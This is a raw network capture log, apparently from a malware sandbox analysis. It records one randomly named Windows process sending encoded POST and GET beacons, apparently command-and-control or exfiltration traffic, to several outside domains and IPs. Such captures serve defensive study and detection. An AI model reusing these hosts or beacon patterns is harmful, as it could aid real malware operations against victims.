                                                                                                        Nov 6, 2024 08:41:26.817244053 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:26 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 138
                                                                                                        Connection: close
                                                                                                        ETag: "669137aa-8a"
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        28 | 192.168.2.6 | 50012 | 154.23.184.218 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:41:28.450025082 CET | 546 | OUT | GET /rqnz/?DDp=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5j7kTaNGBLKG6O6VRta8dhdFdziPB3CVN6I/2AxSEUg2RCppISrE=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.d63dm.top
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:41:29.382304907 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:29 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 138
                                                                                                        Connection: close
                                                                                                        ETag: "669137aa-8a"
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        29 | 192.168.2.6 | 50013 | 31.31.196.17 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:41:34.704093933 CET | 813 | OUT | POST /h26k/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.servannto.site
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.servannto.site
                                                                                                        Referer: http://www.servannto.site/h26k/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Ascii: DDp=6DLu6QMM1jamKfJLWEved+DrFew7XDzMVOuQDWYCxkGpo33DuF5g6+X5dsEBFiRBE5/yUoRNLONfv5xhDoy/DYej7Ro5QYaeNPP2KYO9szSjNxwfowudl2GJj28zzFOW1W46rvp+Ce5Uq0nT5F8O6iMhTyW//ru+tYKAkllQbbUzpGIJMbiqLFAHSZjFCfVg7pswTbUnNRNl
                                                                                                        Nov 6, 2024 08:41:35.580090046 CET | 375 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:35 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Encoding: gzip


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        30 | 192.168.2.6 | 50014 | 31.31.196.17 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:41:37.249558926 CET | 837 | OUT | POST /h26k/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.servannto.site
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.servannto.site
                                                                                                        Referer: http://www.servannto.site/h26k/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Ascii: DDp=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxwqpoWHDhhtg/+X5VMEILCRKE57AUsRNLPtfv8dhCYO8DIehwxo7UYaeNPP2KYaDszajMFMfuUaesWGWrW8z3FOS1W5fru1ACcxUq3zTgwINgyNoMCX+z57PkIDDtz9HArwMlQVTQoiJZVgFSb73C/VK5pUwBMYACloGo3lWvaRBBIV5MJdGgsocTg==
                                                                                                        Nov 6, 2024 08:41:38.165126085 CET | 375 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:38 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Encoding: gzip


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        31 | 192.168.2.6 | 50015 | 31.31.196.17 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Nov 6, 2024 08:41:39.824002981 CET | 1850 | OUT | POST /h26k/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.servannto.site
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.servannto.site
                                                                                                        Referer: http://www.servannto.site/h26k/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: DDp=[TRUNCATED]
Nov 6, 2024 08:41:40.729546070 CET | 375 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:40 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 50016 | 31.31.196.178 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:42.600986958 CET | 551 | OUT | GET /h26k/?DDp=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcHbS91xJIfYTkMJziJL2bz2TZCx10rmCstVSToHcp1Wua4EZrnYI=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.servannto.site
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:41:43.401824951 CET | 733 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:43 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 50017 | 13.248.169.48 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:48.785178900 CET | 807 | OUT | POST /ykhz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.telforce.one
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.telforce.one
                                                                                                        Referer: http://www.telforce.one/ykhz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Ascii: DDp=TlYXPEdpchGDzLoQjMOGNXR7Ax2yID1B0zQ1U+gj2j63KLpCE/HaBKkvsLs6Qb3Q5n3FSzjKrDp/cXnemgdAwD9L/dLIGyG/8xf8eSRHW/MSCLKZyIDQLH0vzmaANcBg8jMOaBHqHNQJLAdwQA7rwWUP6+OX1Fq4tRHiQ2/YlQs16/k7/juIZJH0ylptq2ZMpaT9wcydw7gY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 50018 | 13.248.169.48 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:51.339236021 CET | 831 | OUT | POST /ykhz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.telforce.one
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.telforce.one
                                                                                                        Referer: http://www.telforce.one/ykhz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Ascii: DDp=TlYXPEdpchGDyr4QvPmGM3R4PR2ydz1d0zc1U/kz2Wq3KuVCH6zaGKkvnrtwd73h5nq4SyvKrDV/cTjelRdH2T9JqtLKJSG/8xf8eS1hW7oSC7aZzt/TXX0o7GaAJcBa8jMWaFHAHPoJLBtweyDo5WUV++PIlnj9hhy/M1PL6BsFyp5hjQurLZn2ynxfqWZmrar9iL+6/PF79/CeoqGzsakA/bIddZLMiQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 50019 | 13.248.169.48 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:54.032172918 CET | 1844 | OUT | POST /ykhz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.telforce.one
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.telforce.one
                                                                                                        Referer: http://www.telforce.one/ykhz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: DDp=[TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 50020 | 13.248.169.48 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:41:56.580204964 CET | 549 | OUT | GET /ykhz/?DDp=enw3MzdkIinzycog2d+xaWpEHXfvQHhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N6hR069XLEnbGwgzEaDN1WPABKrmY5eDWHUcJ5DCyIOZX0iwQYxg=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.telforce.one
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:41:57.217624903 CET | 409 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Wed, 06 Nov 2024 07:41:57 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 269
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DDp=enw3MzdkIinzycog2d+xaWpEHXfvQHhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N6hR069XLEnbGwgzEaDN1WPABKrmY5eDWHUcJ5DCyIOZX0iwQYxg=&SvrLY=3P8lALA"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 50021 | 217.76.156.252 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:02.566617966 CET | 801 | OUT | POST /qutj/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.cesach.net
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.cesach.net
                                                                                                        Referer: http://www.cesach.net/qutj/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Ascii: DDp=28hBuj8uNYn4Zjmw5dhwaSoS/t5FEMW/JA7XnWiDJZwhNNEsRrCqamIBMZixnSZk22YPKdQ62t3VaR8CQR3iYpB69gsj6U5EsgWYkK7qo1GzRxF3st6kXJS1oxAzghnI76/z0qLnnH5qP2yNqtRpyhG10AKcsgtTt707F2ndau8+PdABdNyNbOxDtO7Ax9CuNig1RvxivwJi
Nov 6, 2024 08:42:03.545226097 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:42:03 GMT
                                                                                                        Server: Apache
                                                                                                        X-ServerIndex: llim604
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
Nov 6, 2024 08:42:03.545241117 CET | 1236 | IN |
                                                                                                        Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL-->
Nov 6, 2024 08:42:03.545253038 CET | 1236 | IN |
                                                                                                        Data Ascii: m/imgs/parking/icon-desplegar.jpg"> <span>WEB ALOJADA EN PIENSA SOLUTIONS</span> <p>Si quieres obtener m&aacute;s informaci&oacute;n para crear tu propio proyecto online, consulta nuestros productos en la parte inferior.</p>
                                                                                                        Nov 6, 2024 08:42:03.545264959 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b 73 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                        Data Ascii: <button>ver m&aacute;s</button> </article></a> <a href="https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=web"><article> <img src="https:/
                                                                                                        Nov 6, 2024 08:42:03.545274973 CET848INData Raw: 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 43 6f 72 72 65 6f 20 63 6f 6e 20 61 63 63 65 73 6f 20 73 65 67 75 72 6f 20 70 61 72 61 20 74 75 73 20 62 75 7a 6f 6e 65 73 2e 20 43 6f 6e 20 66 75 6e 63 69 6f 6e 61 6c
                                                                                                        Data Ascii: </h2> <p>Correo con acceso seguro para tus buzones. Con funcionalidades colaborativas. </p> <button>ver m&aacute;s</button> </article></a>--> </div> </div></section><section cl
                                                                                                        Nov 6, 2024 08:42:03.545284986 CET1236INData Raw: 52 4c 20 66 69 6a 61 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69 3e 20 46 69 6c 74 72 6f 20 41 6e 74 69 73 70 61 6d 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: RL fija</li> <li><i class="icon-ok"></i> Filtro Antispam</li> <li><i class="icon-ok"></i> 5 Cuentas de correo redirigido</li> </ul> </a></section><footer> <a class="logo" href="https://www.piens
                                                                                                        Nov 6, 2024 08:42:03.545295000 CET12INData Raw: 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: html>0
                                                                                                        Nov 6, 2024 08:42:03.545351982 CET12INData Raw: 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 50022 | 217.76.156.252 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:05.145266056 CET | 825 | OUT | POST /qutj/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.cesach.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Cache-Control: no-cache
Origin: http://www.cesach.net
Referer: http://www.cesach.net/qutj/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Ascii: DDp=28hBuj8uNYn4I3iw48hwNCod7d5FKsXXJA3XnXWTIsAhMpUsQqCqZmIBVpi0kiZV22V4KfE62tjVaUACRmr9KJB42Ash105EsgWYkKG/oxSzRB13sM6jepS2/BAz2RmB76/d0rnNnFxqP2CNq8Rq9hG3pwLPt1cMod49F0PfFuVaOrdbB+yuJeRBtMjyxdCEPiY1D49FgEsBhiIFyh0m7UayMAMxHjKS2Q==
Nov 6, 2024 08:42:06.056349993 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 07:42:05 GMT
Server: Apache
X-ServerIndex: llim605
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 50023 | 217.76.156.252 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:07.686288118 CET | 1838 | OUT | POST /qutj/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.cesach.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: no-cache
Origin: http://www.cesach.net
Referer: http://www.cesach.net/qutj/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:42:08.558403969 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 07:42:08 GMT
Server: Apache
X-ServerIndex: llim603
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 50024 | 217.76.156.252 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe

Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:42:10.231962919 CET | 547 | OUT | GET /qutj/?SvrLY=3P8lALA&DDp=7+JhtXYoap6hQUSymN1iKxwf+aYIN87BChjykmSFD5cBOLIEN7eTZiNCYJGnmhE2/2tIBPcr+sPRMyccTmjbMYtkzAsmzkJCtDvOtemIhBWnTn54lM+8e5KyjQNsphyX8LHz3fM= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.cesach.net
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:42:11.111923933 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 07:42:10 GMT
Server: Apache
X-ServerIndex: llim603
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
                                                                                                        Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f [TRUNCATED]
                                                                                                        Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
